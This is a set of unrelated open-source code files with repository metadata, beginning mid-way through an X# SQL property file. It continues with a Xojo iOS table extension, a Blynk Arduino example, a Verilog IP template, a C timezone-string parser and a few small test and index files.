ODBC Login dialog box is displayed.</summary> MEMBER DispLogin /// <summary>Specifies if error messages are displayed (True (.T.)) or are not displayed (False (.F.), the default).</summary> MEMBER DispWarnings /// <summary>The idle timeout interval in minutes. Active connections are deactivated after the specified time interval. /// The default value is 0 (wait indefinitely).</summary> MEMBER IdleTimeout /// <summary>The native commandtext in the SQLStatement object.</summary> MEMBER NativeCommand /// <summary>The internal ODBC connection, which may be used by external code to call ODBC.</summary> /// <remarks>In X# this does not return the connection handle but the DbConnection object !</remarks> MEMBER ODBChdbc /// <summary>The internal ODBC statement , which may be used by external code to call ODBC.</summary> /// <remarks>In X# this does not return the statement handle but the DbCommand object !</remarks> MEMBER ODBChstmt /// <summary>The size of the network packet used by the connection. Adjusting this value can improve performance. /// The default value is 4096 bytes (4K).</summary> MEMBER PacketSize /// <summary>The connection password.</summary> MEMBER Password /// <summary>Specifies the time to wait (in seconds) before returning a general time-out error. /// If you specify 0 (the default), the wait is indefinite and a time-out error is never returned. QueryTimeOut can be 0 to 600.</summary> MEMBER QueryTimeOut /// <summary>Specifies whether the underlying connection is a shared connection (True (.T.)), or not (False (.F.)).</summary> MEMBER Shared /// <summary>Contains a numeric value that determines how the connection manages transactions on the remote table.</summary> MEMBER Transactions /// <summary>The user identification.</summary> MEMBER UserId /// <summary>The amount of time in milliseconds that elapses before Visual FoxPro checks if the SQL statement /// has completed executing. The default is 100 milliseconds.</summary> MEMBER WaitTime END ENUM INTERNAL GLOBAL sqlProperties AS Dictionary<STRING, LONG> FUNCTION GetSQLProperty(propertyName as STRING) AS LONG IF sqlProperties == NULL sqlProperties := Dictionary<STRING, LONG>{StringComparer.OrdinalIgnoreCase} var values := System.Enum.GetValues(typeof(XSharp.RDD.SQLProperty)) FOREACH var enumvalue in values var name := System.Enum.GetName(typeof(XSharp.RDD.SQLProperty), enumvalue) sqlProperties:Add(name, (LONG) enumvalue) NEXT ENDIF IF sqlProperties:ContainsKey(propertyName) return sqlProperties[propertyName] ENDIF RETURN -1
xBase
5
orangesocks/XSharpPublic
Runtime/XSharp.Core/RDD/SqlProperties.prg
[ "Apache-2.0" ]
#tag Class Class ImprovediOSTable Inherits iOSTable #tag Event Sub Open() declare function object_getClass lib "/usr/lib/libobjc.A.dylib" (cls As Ptr) As Ptr declare function NSSelectorFromString lib "Foundation" (aSelectorName as CFStringRef) as Ptr declare function class_addMethod lib "/usr/lib/libobjc.A.dylib" (cls as Ptr, name as Ptr, imp as Ptr, types as CString) as Boolean declare function class_replaceMethod lib "/usr/lib/libobjc.A.dylib" (cls as Ptr, name as Ptr, imp as Ptr, types as CString) as Boolean declare function NSClassFromString lib "Foundation" (clsName as CFStringRef) as ptr declare function getDelegate lib "UIKit" selector "delegate" (obj_id as ptr) as ptr dim mydel as ptr = getDelegate(self.Handle) dim mydelClass as ptr = object_getClass(mydel) if not class_addMethod(mydelClass, NSSelectorFromString("scrollViewDidEndDecelerating:"), _ AddressOf impl_scrollViewDidScroll, "v@:@") then break 'declare function NSStringFromClass lib "Foundation" (aClass as ptr) as CFStringRef 'declare function NSProtocolFromString lib "Foundation" (protocolName as CFStringRef) as ptr ' 'declare function class_conformsToProtocol lib "/usr/lib/libobjc.A.dylib" (cls as ptr, protocol as ptr) as Boolean if dispatch = nil then dispatch = new xojo.Core.Dictionary dispatch.Value(mydel) = xojo.Core.WeakRef.Create(self) RaiseEvent Open End Sub #tag EndEvent #tag Method, Flags = &h21 Private Sub didScroll(sView as ptr) 'float bottomEdge = scrollView.contentOffset.y + scrollView.frame.size.height; 'if (bottomEdge >= scrollView.contentSize.height) { '// we are at the end '} #if Target32Bit declare function frame lib UIKitLib selector "frame" (obj_id as ptr) as NSRect32 declare function contentOffset lib UIKitLib selector "contentOffset" (obj_id as ptr) as NSPoint32 declare function contentSize lib UIKitLib selector "contentSize" (obj_id as Ptr) as NSSize32 #Elseif Target64Bit declare function frame lib UIKitLib selector "frame" (obj_id as ptr) as NSRect64 declare function contentOffset lib UIKitLib selector "contentOffset" (obj_id as ptr) as NSPoint64 declare function contentSize lib UIKitLib selector "contentSize" (obj_id as Ptr) as NSSize64 #Endif Break dim mframe as NSRect = frame(sView) dim offset as NSPoint = contentOffset(sView) dim cSize as NSSize = contentSize(sView) dim bottomEdge as Double = offset.y + mframe.rsize.h if bottomEdge >= cSize.h then RaiseEvent ScrollToBottom end if End Sub #tag EndMethod #tag Method, Flags = &h0 Shared Sub impl_scrollViewDidScroll(pid as ptr, sel as ptr, view as ptr) dim w as xojo.Core.WeakRef = xojo.core.WeakRef(dispatch.Value(pid)) if w.Value <> nil Then ImprovediOSTable(w.Value).didScroll(view) end if #Pragma Unused sel End Sub #tag EndMethod #tag Hook, Flags = &h0 Event Open() #tag EndHook #tag Hook, Flags = &h0 Event ScrollToBottom() #tag EndHook #tag Property, Flags = &h21 Private Shared dispatch As xojo.Core.Dictionary #tag EndProperty #tag ViewBehavior #tag ViewProperty Name="AllowRefresh" Visible=true Group="Behavior" InitialValue="False" Type="Boolean" EditorType="" #tag EndViewProperty #tag ViewProperty Name="AccessibilityHint" Visible=false Group="Behavior" InitialValue="" Type="Text" EditorType="" #tag EndViewProperty #tag ViewProperty Name="AccessibilityLabel" Visible=false Group="Behavior" InitialValue="" Type="Text" EditorType="" #tag EndViewProperty #tag ViewProperty Name="EditingEnabled" Visible=false Group="Behavior" InitialValue="" Type="Boolean" EditorType="" #tag EndViewProperty #tag ViewProperty Name="EstimatedRowHeight" Visible=true Group="Behavior" InitialValue="-1" Type="Integer" EditorType="" #tag EndViewProperty #tag ViewProperty Name="Format" Visible=true Group="Behavior" InitialValue="" Type="iOSTable.Formats" EditorType="Enum" #tag EnumValues "0 - Plain" "1 - Grouped" #tag EndEnumValues #tag EndViewProperty #tag ViewProperty Name="Height" Visible=true Group="Position" InitialValue="" Type="Double" EditorType="" #tag EndViewProperty #tag ViewProperty Name="Index" Visible=true Group="ID" InitialValue="-2147483648" Type="Integer" EditorType="" #tag EndViewProperty #tag ViewProperty Name="Left" Visible=true Group="Position" InitialValue="0" Type="Integer" EditorType="" #tag EndViewProperty #tag ViewProperty Name="Name" Visible=true Group="ID" InitialValue="" Type="String" EditorType="" #tag EndViewProperty #tag ViewProperty Name="SectionCount" Visible=false Group="Behavior" InitialValue="" Type="Integer" EditorType="" #tag EndViewProperty #tag ViewProperty Name="Super" Visible=true Group="ID" InitialValue="" Type="String" EditorType="" #tag EndViewProperty #tag ViewProperty Name="Top" Visible=true Group="Position" InitialValue="0" Type="Integer" EditorType="" #tag EndViewProperty #tag ViewProperty Name="Visible" Visible=true Group="Behavior" InitialValue="" Type="Boolean" EditorType="" #tag EndViewProperty #tag ViewProperty Name="Width" Visible=true Group="Position" InitialValue="" Type="Double" EditorType="" #tag EndViewProperty #tag EndViewBehavior End Class #tag EndClass
Xojo
4
kingj5/iOSKit
Modules/Extensions/ImprovediOSTable.xojo_code
[ "MIT" ]
/************************************************************* Download latest Blynk library here: https://github.com/blynkkk/blynk-library/releases/latest Blynk is a platform with iOS and Android apps to control Arduino, Raspberry Pi and the likes over the Internet. You can easily build graphic interfaces for all your projects by simply dragging and dropping widgets. Downloads, docs, tutorials: http://www.blynk.cc Sketch generator: http://examples.blynk.cc Blynk community: http://community.blynk.cc Follow us: http://www.fb.com/blynkapp http://twitter.com/blynk_app Blynk library is licensed under MIT license This example code is in public domain. ************************************************************* This example shows you how you can use server as storage for your data like EEPROM Project setup in the Blynk app (not necessary): Value display on V1 in PUSH mode. *************************************************************/ /* Comment this out to disable prints and save space */ #define BLYNK_PRINT Serial /* Fill-in your Template ID (only if using Blynk.Cloud) */ //#define BLYNK_TEMPLATE_ID "YourTemplateID" #include <SPI.h> #include <Ethernet.h> #include <BlynkSimpleEthernet.h> // You should get Auth Token in the Blynk App. // Go to the Project Settings (nut icon). char auth[] = "YourAuthToken"; BlynkTimer timer; int uptimeCounter; String someStaticData = "SomeStaticData"; // This function will run every time Blynk connection is established BLYNK_CONNECTED() { //get data stored in virtual pin V0 from server Blynk.syncVirtual(V0); } // restoring counter from server BLYNK_WRITE(V0) { //restoring int value uptimeCounter = param[0].asInt(); //restoring string value someStaticData = param[1].asString(); } void increment() { uptimeCounter++; //storing int and string in V0 pin on server Blynk.virtualWrite(V0, uptimeCounter, someStaticData); //updating value display with uptimeCounter Blynk.virtualWrite(V1, uptimeCounter); } void setup() { // Debug console Serial.begin(9600); Blynk.begin(auth); timer.setInterval(1000L, increment); } void loop() { Blynk.run(); timer.run(); }
Arduino
5
kayatmin/blynk-library
examples/More/ServerAsDataStorage/ServerAsDataStorage_MultiValue/ServerAsDataStorage_MultiValue.ino
[ "MIT" ]
typedef Issue5345<T> = Issue5345b<T>; typedef Issue5345b<T> = Issue5345<T>; class Main2 { public static function main() {} }
Haxe
1
Alan-love/haxe
tests/misc/compiler_loops/projects/Issue5345/Main2.hx
[ "MIT" ]
<div> <p>For example, consider a web page like this:</p> <pre class="brush: html line-numbers language-html"><code class=" language-html"><span class="token doctype">&lt;!DOCTYPE html&gt;</span> <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>html</span><span class="token punctuation">&gt;</span></span> <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>head</span><span class="token punctuation">&gt;</span></span> <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>meta</span> <span class="token attr-name">http-equiv</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>content-type<span class="token punctuation">"</span></span> <span class="token attr-name">content</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>text/html; charset<span class="token punctuation">=</span>utf-8<span class="token punctuation">"</span></span> <span class="token punctuation">/&gt;</span></span> <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>head</span><span class="token punctuation">&gt;</span></span> <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>body</span><span class="token punctuation">&gt;</span></span> <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>script</span> <span class="token attr-name">src</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>page-scripts/page-script.js<span class="token punctuation">"</span></span><span class="token punctuation">&gt;</span></span><span class="token script language-javascript"></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>script</span><span class="token punctuation">&gt;</span></span> <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>body</span><span class="token punctuation">&gt;</span></span> <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>html</span><span class="token punctuation">&gt;</span></span><span class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre> <p>The script "page-script.js" does this:</p> </div>
HTML
3
asahiocean/joplin
packages/app-cli/tests/enex_to_md/code1.html
[ "MIT" ]
// (c) Copyright 1995-2018 Xilinx, Inc. All rights reserved. // // This file contains confidential and proprietary information // of Xilinx, Inc. and is protected under U.S. and // international copyright and other intellectual property // laws. // // DISCLAIMER // This disclaimer is not a license and does not grant any // rights to the materials distributed herewith. Except as // otherwise provided in a valid license issued to you by // Xilinx, and to the maximum extent permitted by applicable // law: (1) THESE MATERIALS ARE MADE AVAILABLE "AS IS" AND // WITH ALL FAULTS, AND XILINX HEREBY DISCLAIMS ALL WARRANTIES // AND CONDITIONS, EXPRESS, IMPLIED, OR STATUTORY, INCLUDING // BUT NOT LIMITED TO WARRANTIES OF MERCHANTABILITY, NON- // INFRINGEMENT, OR FITNESS FOR ANY PARTICULAR PURPOSE; and // (2) Xilinx shall not be liable (whether in contract or tort, // including negligence, or under any other theory of // liability) for any loss or damage of any kind or nature // related to, arising under or in connection with these // materials, including for any direct, or any indirect, // special, incidental, or consequential loss or damage // (including loss of data, profits, goodwill, or any type of // loss or damage suffered as a result of any action brought // by a third party) even if such damage or loss was // reasonably foreseeable or Xilinx had been advised of the // possibility of the same. // // CRITICAL APPLICATIONS // Xilinx products are not designed or intended to be fail- // safe, or for use in any application requiring fail-safe // performance, such as life-support or safety devices or // systems, Class III medical devices, nuclear facilities, // applications related to the deployment of airbags, or any // other applications that could lead to death, personal // injury, or severe property or environmental damage // (individually and collectively, "Critical // Applications"). Customer assumes the sole risk and // liability of any use of Xilinx products in Critical // Applications, subject only to applicable laws and // regulations governing limitations on product liability. // // THIS COPYRIGHT NOTICE AND DISCLAIMER MUST BE RETAINED AS // PART OF THIS FILE AT ALL TIMES. // // DO NOT MODIFY THIS FILE. // IP VLNV: xilinx.com:ip:aurora_64b66b:11.2 // IP Revision: 2 // The following must be inserted into your Verilog file for this // core to be instantiated. Change the instance name and port connections // (in parentheses) to your own signal names. //----------- Begin Cut here for INSTANTIATION Template ---// INST_TAG aurora_64b66b_25p4G your_instance_name ( .rxp(rxp), // input wire [0 : 0] rxp .rxn(rxn), // input wire [0 : 0] rxn .refclk1_in(refclk1_in), // input wire refclk1_in .user_clk(user_clk), // input wire user_clk .sync_clk(sync_clk), // input wire sync_clk .reset_pb(reset_pb), // input wire reset_pb .power_down(power_down), // input wire power_down .pma_init(pma_init), // input wire pma_init .loopback(loopback), // input wire [2 : 0] loopback .txp(txp), // output wire [0 : 0] txp .txn(txn), // output wire [0 : 0] txn .hard_err(hard_err), // output wire hard_err .soft_err(soft_err), // output wire soft_err .channel_up(channel_up), // output wire channel_up .lane_up(lane_up), // output wire [0 : 0] lane_up .tx_out_clk(tx_out_clk), // output wire tx_out_clk .bufg_gt_clr_out(bufg_gt_clr_out), // output wire bufg_gt_clr_out .gt_pll_lock(gt_pll_lock), // output wire gt_pll_lock .s_axi_tx_tdata(s_axi_tx_tdata), // input wire [0 : 63] s_axi_tx_tdata .s_axi_tx_tkeep(s_axi_tx_tkeep), // input wire [0 : 7] s_axi_tx_tkeep .s_axi_tx_tlast(s_axi_tx_tlast), // input wire s_axi_tx_tlast .s_axi_tx_tvalid(s_axi_tx_tvalid), // input wire s_axi_tx_tvalid .s_axi_tx_tready(s_axi_tx_tready), // output wire s_axi_tx_tready .m_axi_rx_tdata(m_axi_rx_tdata), // output wire [0 : 63] m_axi_rx_tdata .m_axi_rx_tkeep(m_axi_rx_tkeep), // output wire [0 : 7] m_axi_rx_tkeep .m_axi_rx_tlast(m_axi_rx_tlast), // output wire m_axi_rx_tlast .m_axi_rx_tvalid(m_axi_rx_tvalid), // output wire m_axi_rx_tvalid .mmcm_not_locked(mmcm_not_locked), // input wire mmcm_not_locked .s_axi_awaddr(s_axi_awaddr), // input wire [31 : 0] s_axi_awaddr .s_axi_rresp(s_axi_rresp), // output wire [1 : 0] s_axi_rresp .s_axi_bresp(s_axi_bresp), // output wire [1 : 0] s_axi_bresp .s_axi_wstrb(s_axi_wstrb), // input wire [3 : 0] s_axi_wstrb .s_axi_wdata(s_axi_wdata), // input wire [31 : 0] s_axi_wdata .s_axi_araddr(s_axi_araddr), // input wire [31 : 0] s_axi_araddr .s_axi_rdata(s_axi_rdata), // output wire [31 : 0] s_axi_rdata .s_axi_bready(s_axi_bready), // input wire s_axi_bready .s_axi_awvalid(s_axi_awvalid), // input wire s_axi_awvalid .s_axi_awready(s_axi_awready), // output wire s_axi_awready .s_axi_wvalid(s_axi_wvalid), // input wire s_axi_wvalid .s_axi_wready(s_axi_wready), // output wire s_axi_wready .s_axi_bvalid(s_axi_bvalid), // output wire s_axi_bvalid .s_axi_arvalid(s_axi_arvalid), // input wire s_axi_arvalid .s_axi_arready(s_axi_arready), // output wire s_axi_arready .s_axi_rvalid(s_axi_rvalid), // output wire s_axi_rvalid .s_axi_rready(s_axi_rready), // input wire s_axi_rready .init_clk(init_clk), // input wire init_clk .link_reset_out(link_reset_out), // output wire link_reset_out .gt_qpllclk_quad1_in(gt_qpllclk_quad1_in), // input wire gt_qpllclk_quad1_in .gt_qpllrefclk_quad1_in(gt_qpllrefclk_quad1_in), // input wire gt_qpllrefclk_quad1_in .gt_to_common_qpllreset_out(gt_to_common_qpllreset_out), // output wire gt_to_common_qpllreset_out .gt_qplllock_quad1_in(gt_qplllock_quad1_in), // input wire gt_qplllock_quad1_in .gt_qpllrefclklost_quad1(gt_qpllrefclklost_quad1), // input wire gt_qpllrefclklost_quad1 .gt_rxcdrovrden_in(gt_rxcdrovrden_in), // input wire gt_rxcdrovrden_in .sys_reset_out(sys_reset_out), // output wire sys_reset_out .gt_powergood(gt_powergood) // output wire [0 : 0] gt_powergood ); // INST_TAG_END ------ End INSTANTIATION Template --------- // You must compile the wrapper file aurora_64b66b_25p4G.v when simulating // the core, aurora_64b66b_25p4G. When compiling the wrapper file, be sure to // reference the Verilog simulation library.
Verilog
3
TonyBrewer/OpenHT
tests/userio_vadd_prbs_test/scripts/aurora_64b66b_25p4G/aurora_64b66b_25p4G.veo
[ "BSD-3-Clause" ]
/* * The MIT License (MIT) * * Copyright (c) 2021 MongoDB, Inc. * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. */ #include "timelib.h" #include "timelib_private.h" // This section adds the missing 'strndup' implementation on Windows. #if TIMELIB_USE_BUILTIN_STRNDUP == 1 # include <stdlib.h> # include <string.h> /** * char* timelib_strndup(const char* s, size_t n) * * Returns a pointer to a copy of 's' with at most 'n' characters * in memory obtained from 'malloc', or 'NULL' if insufficient * memory was available. The result is always 'NULL' terminated. */ static char* timelib_strndup(const char* s, size_t n) { char* result; size_t len = strlen(s); if (n < len) { len = n; } result = (char*)malloc(len + 1); if (!result) { return 0; } result[len] = '\0'; return (char*)memcpy(result, s, len); } #endif /* Forwards declrations */ static timelib_posix_trans_info *timelib_posix_trans_info_ctor(void); static void timelib_posix_trans_info_dtor(timelib_posix_trans_info* ts); /* "<" [+-]? .+? ">" */ static char *read_description_numeric_abbr(char **ptr) { const char *begin = *ptr + 1; // skip '<' (*ptr)++; while (**ptr != '\0' && **ptr != '>') { (*ptr)++; } if (**ptr == '\0') { return NULL; } if (**ptr == '>') { (*ptr)++; } // Abbreviation may not be empty if (*ptr - begin - 1 < 1) { return NULL; } return timelib_strndup(begin, *ptr - begin - 1); } /* [A-Z]+ */ static char *read_description_abbr(char **ptr) { const char *begin = *ptr; // Find the end while ((**ptr >= 'A' && **ptr <= 'Z') || (**ptr >= 'a' && **ptr <= 'z')) { (*ptr)++; } // Abbreviation may not be empty if (*ptr - begin < 1) { return NULL; } return timelib_strndup(begin, *ptr - begin); } /* "<" [+-]? .+? ">" | [A-Z]+ */ static char *read_description(char **ptr) { if (**ptr == '<') { return read_description_numeric_abbr(ptr); } else { return read_description_abbr(ptr); } } /* [+-]? */ static int read_sign(char **ptr) { int bias = 1; if (**ptr == '+') { (*ptr)++; } else if (**ptr == '-') { bias = -1; (*ptr)++; } return bias; } /* [0-9]+ */ static timelib_sll read_number(char **ptr) { const char *begin = *ptr; int acc = 0; // skip leading 0's while (**ptr == '0') { (*ptr)++; } while (**ptr >= '0' && **ptr <= '9') { acc = acc * 10; acc += (**ptr) - '0'; (*ptr)++; } if (begin == *ptr) { return TIMELIB_UNSET; } return acc; } /* [+-]? [0-9]+ ( ":" [0-9]+ ( ":" [0-9]+ )? )? */ static timelib_sll read_offset(char **ptr) { const char *begin; int bias = read_sign(ptr); int hours = 0; int minutes = 0; int seconds = 0; begin = *ptr; // read through to : or non-digit for hours hours = read_number(ptr); if (hours == TIMELIB_UNSET) { return hours; } // check for optional minutes if (**ptr == ':') { (*ptr)++; // skip ':' minutes = read_number(ptr); if (minutes == TIMELIB_UNSET) { return minutes; } } // check for optional seconds if (**ptr == ':') { (*ptr)++; // skip ':' seconds = read_number(ptr); if (seconds == TIMELIB_UNSET) { return seconds; } } if (begin == *ptr) { return TIMELIB_UNSET; } // multiplication with -1, because the offset in the identifier is the // 'wrong' way around as for example EST5 is UTC-5 (and not +5) return -1 * bias * (hours * 3600 + minutes * 60 + seconds); } // Mw.m.d static timelib_posix_trans_info* read_trans_spec_mwd(char **ptr) { timelib_posix_trans_info *tmp = timelib_posix_trans_info_ctor(); tmp->type = TIMELIB_POSIX_TRANS_TYPE_MWD; // Skip 'M' (*ptr)++; tmp->mwd.month = read_number(ptr); if (tmp->mwd.month == TIMELIB_UNSET) { goto fail; } // check for '.' and skip it if (**ptr != '.') { goto fail; } (*ptr)++; tmp->mwd.week = read_number(ptr); if (tmp->mwd.week == TIMELIB_UNSET) { goto fail; } // check for '.' and skip it if (**ptr != '.') { goto fail; } (*ptr)++; tmp->mwd.dow = read_number(ptr); if (tmp->mwd.dow == TIMELIB_UNSET) { goto fail; } return tmp; fail: timelib_posix_trans_info_dtor(tmp); return NULL; } // (Jn | n | Mw.m.d) ( /time )? static timelib_posix_trans_info* read_transition_spec(char **ptr) { timelib_posix_trans_info *tmp; if (**ptr == 'M') { tmp = read_trans_spec_mwd(ptr); if (!tmp) { return NULL; } } else { tmp = timelib_posix_trans_info_ctor(); if (**ptr == 'J') { tmp->type = TIMELIB_POSIX_TRANS_TYPE_JULIAN_NO_FEB29; (*ptr)++; } tmp->days = read_number(ptr); if (tmp->days == TIMELIB_UNSET) { goto fail; } } // Check for the optional hour if (**ptr == '/') { (*ptr)++; tmp->hour = read_offset(ptr); if (tmp->hour == TIMELIB_UNSET) { goto fail; } // as the bias for normal offsets = -1, we need to reverse it here tmp->hour = -tmp->hour; } return tmp; fail: timelib_posix_trans_info_dtor(tmp); return NULL; } static timelib_posix_trans_info* timelib_posix_trans_info_ctor(void) { timelib_posix_trans_info *tmp; tmp = timelib_calloc(1, sizeof(timelib_posix_trans_info)); tmp->type = TIMELIB_POSIX_TRANS_TYPE_JULIAN_FEB29; tmp->hour = 2 * 3600; return tmp; } static void timelib_posix_trans_info_dtor(timelib_posix_trans_info* ts) { timelib_free(ts); } void timelib_posix_str_dtor(timelib_posix_str *ps) { if (ps->std) { timelib_free(ps->std); } if (ps->dst) { timelib_free(ps->dst); } if (ps->dst_begin) { timelib_posix_trans_info_dtor(ps->dst_begin); } if (ps->dst_end) { timelib_posix_trans_info_dtor(ps->dst_end); } timelib_free(ps); } timelib_posix_str* timelib_parse_posix_str(const char *posix) { timelib_posix_str *tmp = timelib_calloc(1, sizeof(timelib_posix_str)); char *ptr = (char*) posix; // read standard description (ie. EST or <-03>) tmp->std = read_description(&ptr); if (!tmp->std) { timelib_posix_str_dtor(tmp); return NULL; } // read required offset tmp->std_offset = read_offset(&ptr); if (tmp->std_offset == TIMELIB_UNSET) { timelib_posix_str_dtor(tmp); return NULL; } // if we're at the end return, otherwise we'll continue to try to parse // the dst abbreviation and spec if (*ptr == '\0') { return tmp; } // assume dst is there, and initialise offset tmp->dst_offset = tmp->std_offset + 3600; tmp->dst = read_description(&ptr); if (!tmp->dst) { timelib_posix_str_dtor(tmp); return NULL; } // if we have a "," here, then the dst offset is the standard offset + // 3600 seconds, otherwise, try to parse the dst offset if (*ptr != ',' && *ptr != '\0') { tmp->dst_offset = read_offset(&ptr); if (tmp->dst_offset == TIMELIB_UNSET) { timelib_posix_str_dtor(tmp); return NULL; } } // if we *don't* have a "," here, we're missing the dst transitions // ,start[/time],end[/time] if (*ptr != ',') { timelib_posix_str_dtor(tmp); return NULL; } ptr++; // skip ',' // start[/time] tmp->dst_begin = read_transition_spec(&ptr); if (!tmp->dst_begin) { timelib_posix_str_dtor(tmp); return NULL; } // if we *don't* have a "," here, we're missing the dst end transition // ,end[/time] if (*ptr != ',') { timelib_posix_str_dtor(tmp); return NULL; } ptr++; // skip ',' // end[/time] tmp->dst_end = read_transition_spec(&ptr); if (!tmp->dst_end) { timelib_posix_str_dtor(tmp); return NULL; } // make sure there is no trailing data if (*ptr != '\0') { timelib_posix_str_dtor(tmp); return NULL; } return tmp; } static const int month_lengths[2][MONTHS_PER_YEAR] = { { 31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31 }, // normal year { 31, 29, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31 } // leap year }; /* This function is adapted from the 'localtime.c' function 'transtime' as bundled with the 'tzcode' project * from IANA, and is public domain licensed. */ static timelib_sll calc_transition(timelib_posix_trans_info *psi, timelib_sll year) { int leap_year = timelib_is_leap(year); switch (psi->type) { case TIMELIB_POSIX_TRANS_TYPE_JULIAN_NO_FEB29: { timelib_sll value = (psi->days - 1); if (leap_year && psi->days >= 60) { value++; } return value * SECS_PER_DAY; } case TIMELIB_POSIX_TRANS_TYPE_JULIAN_FEB29: { return psi->days * SECS_PER_DAY; } case TIMELIB_POSIX_TRANS_TYPE_MWD: { /* * Mm.n.d - nth "dth day" of month m. */ int i, d, m1, yy0, yy1, yy2, dow; timelib_sll value = 0; /* Use Zeller's Congruence to get day-of-week of first day of * month. */ m1 = (psi->mwd.month + 9) % 12 + 1; yy0 = (psi->mwd.month <= 2) ? (year - 1) : year; yy1 = yy0 / 100; yy2 = yy0 % 100; dow = ((26 * m1 - 2) / 10 + 1 + yy2 + yy2 / 4 + yy1 / 4 - 2 * yy1) % 7; if (dow < 0) { dow += DAYS_PER_WEEK; } /* "dow" is the day-of-week of the first day of the month. Get the * day-of-month (zero-origin) of the first "dow" day of the month. */ d = psi->mwd.dow - dow; if (d < 0) { d += DAYS_PER_WEEK; } for (i = 1; i < psi->mwd.week; ++i) { if (d + DAYS_PER_WEEK >= month_lengths[leap_year][psi->mwd.month - 1]) { break; } d += DAYS_PER_WEEK; } /* "d" is the day-of-month (zero-origin) of the day we want. */ value = d * SECS_PER_DAY; for (i = 0; i < psi->mwd.month - 1; ++i) { value += month_lengths[leap_year][i] * SECS_PER_DAY; } return value; } break; } return 0; } static timelib_sll count_leap_years(timelib_sll y) { /* Because we want this for Jan 1, the leap day hasn't happend yet, so * subtract one of year before we calculate */ y--; return (y/4) - (y/100) + (y/400); } timelib_sll timelib_ts_at_start_of_year(timelib_sll year) { timelib_sll epoch_leap_years = count_leap_years(1970); timelib_sll current_leap_years = count_leap_years(year); return SECS_PER_DAY * ( ((year-1970) * DAYS_PER_YEAR) + current_leap_years - epoch_leap_years ); } void timelib_get_transitions_for_year(timelib_tzinfo *tz, timelib_sll year, timelib_posix_transitions *transitions) { timelib_sll trans_begin; /* Since start of the year */ timelib_sll trans_end; timelib_sll year_begin_ts = timelib_ts_at_start_of_year(year); trans_begin = year_begin_ts; trans_begin += calc_transition(tz->posix_info->dst_begin, year); trans_begin += tz->posix_info->dst_begin->hour; trans_begin -= tz->posix_info->std_offset; trans_end = year_begin_ts; trans_end += calc_transition(tz->posix_info->dst_end, year); trans_end += tz->posix_info->dst_end->hour; trans_end -= tz->posix_info->dst_offset; if (trans_begin < trans_end) { transitions->times[transitions->count ] = trans_begin; transitions->times[transitions->count+1] = trans_end; transitions->types[transitions->count ] = tz->posix_info->type_index_dst_type; transitions->types[transitions->count+1] = tz->posix_info->type_index_std_type; } else { transitions->times[transitions->count+1] = trans_begin; transitions->times[transitions->count ] = trans_end; transitions->types[transitions->count+1] = tz->posix_info->type_index_dst_type; transitions->types[transitions->count ] = tz->posix_info->type_index_std_type; } transitions->count += 2; } ttinfo* timelib_fetch_posix_timezone_offset(timelib_tzinfo *tz, timelib_sll ts, timelib_sll *transition_time) { timelib_sll year; timelib_time dummy; timelib_posix_transitions transitions = { 0 }; size_t i; /* If there is no second (dst_end) information, the UTC offset is valid for the whole year, so no need to * do clever logic */ if (!tz->posix_info->dst_end) { if (transition_time) { *transition_time = tz->trans[tz->bit64.timecnt - 1]; } return &(tz->type[tz->posix_info->type_index_std_type]); } /* Find 'year' (UTC) for 'ts' */ timelib_unixtime2gmt(&dummy, ts); year = dummy.y; /* Calculate transition times for 'year-1', 'year', and 'year+1' */ timelib_get_transitions_for_year(tz, year - 1, &transitions); timelib_get_transitions_for_year(tz, year, &transitions); timelib_get_transitions_for_year(tz, year + 1, &transitions); /* Check where the 'ts' falls in the 4 transitions */ for (i = 1; i < transitions.count; i++) { if (ts < transitions.times[i]) { if (transition_time) { *transition_time = transitions.times[i - 1]; } return &(tz->type[transitions.types[i - 1]]); } } return NULL; }
C
4
NathanFreeman/php-src
ext/date/lib/parse_posix.c
[ "PHP-3.01" ]
# Provide DPD signatures for tunneling protocols that otherwise # wouldn't be detected at all.
Standard ML
1
yaplej/bro
scripts/base/protocols/tunnels/dpd.sig
[ "Apache-2.0" ]
export { default } from './ToggleButton'; export { default as toggleButtonClasses } from './toggleButtonClasses'; export * from './toggleButtonClasses';
JavaScript
2
good-gym/material-ui
packages/material-ui/src/ToggleButton/index.js
[ "MIT" ]
